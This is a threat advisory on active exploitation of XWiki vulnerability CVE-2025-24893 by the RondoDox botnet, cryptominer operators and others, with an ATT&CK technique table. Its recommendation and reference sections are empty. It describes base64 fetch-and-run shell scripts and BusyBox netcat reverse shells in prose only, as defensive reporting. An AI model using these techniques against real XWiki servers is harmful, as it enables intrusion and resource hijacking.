EXECUTIVE SUMMARY:
A surge in malicious activity targeting XWiki has been observed, with multiple threat actors including the RondoDox Botnet actively exploiting a critical vulnerability CVE-2025-24893 to gain remote access and execute unauthorized commands. What initially appeared as isolated probing has evolved into widespread, coordinated campaigns involving botnets, cryptominer operators, and opportunistic attackers. This rise in exploitation highlights the growing risk for exposed XWiki instances and emphasizes the urgency for organizations to strengthen monitoring and remediation efforts.
Attackers are exploiting the flaw to execute system commands remotely, leveraging simple HTTP-based payload delivery methods. Activity linked to automated botnets includes the use of recognizable payload naming patterns and base64-encoded shell scripts that fetch and run additional malware such as cryptominers. Some adversaries have hosted payloads across diverse infrastructure ranges, while others have attempted direct interactive access through reverse shells using tools like BusyBox netcat. Alongside exploitation, scanning behavior has also increased, including Nuclei-based probing, generic command-execution tests, and out-of-band interaction attempts through OAST services, indicating both automated reconnaissance and targeted hands-on-keyboard activity.
The growing adoption of this exploit across varied threat groups demonstrates how quickly a vulnerability can be weaponized once publicly available. Relying solely on patching cycles may be insufficient given the speed of these attacks; organizations should strengthen detection capabilities, monitor for exploitation patterns, and implement layered defensive measures to reduce the risk of compromise in vulnerable XWiki environments.
THREAT PROFILE:
| Tactic | Technique Id | Technique | Sub-technique |
| Initial Access | T1190 | Exploit Public-Facing Application | — |
| Execution | T1059.004 | Command and Scripting Interpreter | Unix Shell |
| Privilege Escalation | T1068 | Exploitation for Privilege Escalation | — |
| Defense Evasion | T1140 | Deobfuscate/Decode Files or Information | — |
| Discovery | T1087.001 | Account Discovery | Local Account |
| T1082 | System Information Discovery | — | |
| Lateral Movement | T1021.004 | Remote Services | SSH |
| Command and Control | T1071.001 | Application Layer Protocol | Web Protocols |
| Impact | T1496.001 | Resource Hijacking | Compute Hijacking |
RECOMMENDATION:
REFERENCES:
The following reports contain further technical details: